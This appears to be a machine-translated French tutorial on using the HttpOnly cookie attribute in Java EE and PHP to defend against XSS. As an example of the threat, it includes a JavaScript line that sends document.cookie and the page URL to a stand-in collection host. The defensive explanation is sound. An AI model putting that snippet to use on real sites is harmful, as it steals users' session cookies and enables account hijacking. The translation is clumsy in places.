Qu'est-ce que HttpOnly ?
Si vous définissez l'attribut HttpOnly dans cookie, les informations du cookie ne seront pas lues via le script js. Ceci est efficace pour. pour empêcher les attaques XSS, veuillez rechercher sur Google une introduction plus spécifique
L'API est-elle prise en charge par javaEE ?
Actuellement, Sun n'a pas annoncé l'API correspondante, mais PHP et C# l'ont implémentée. Les frères qui sont engagés dans javaEE sont assez déprimés, ne vous inquiétez pas, il existe des solutions de contournement ci-dessous
3 Exemple de paramètre HttpOnly
javaEE response.setHeader("Set-Cookie", "cookiename=value; Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
Cet article présente principalement php pour la défense xss. Utilisez httponly pour empêcher Si une vulnérabilité XSS se produit sur un site Web, du code JS arbitraire peut être exécuté. Le plus terrifiant est que les attaquants utilisent JS pour obtenir un piratage de
cookieou de session. contient une grande quantité d’informations sensibles (informations d’identité, informations d’administrateur), etc., c’est tout. . . Le js suivant obtient les informations sur les cookies :
Le code est le suivant :
Les cookies généraux sont obtenus à partir du documenturl=document.top.location.href; cookie=document.cookie; c=new Image(); c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
. Désormais, le navigateur Lors de la configuration des cookies, un paramètre appelé HttpOnly est généralement accepté, tout comme le domaine et les autres paramètres. Une fois ce HttpOnly défini, vous ne verrez pas le cookie dans l'objet document du navigateur.
Paramètres PHP HttpOnly
:
//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性 ini_set("session.cookie_httponly", 1); //或者setcookie()的第七个参数设置为true session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
header("Set-Cookie: hidden=value; httpOnly");
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!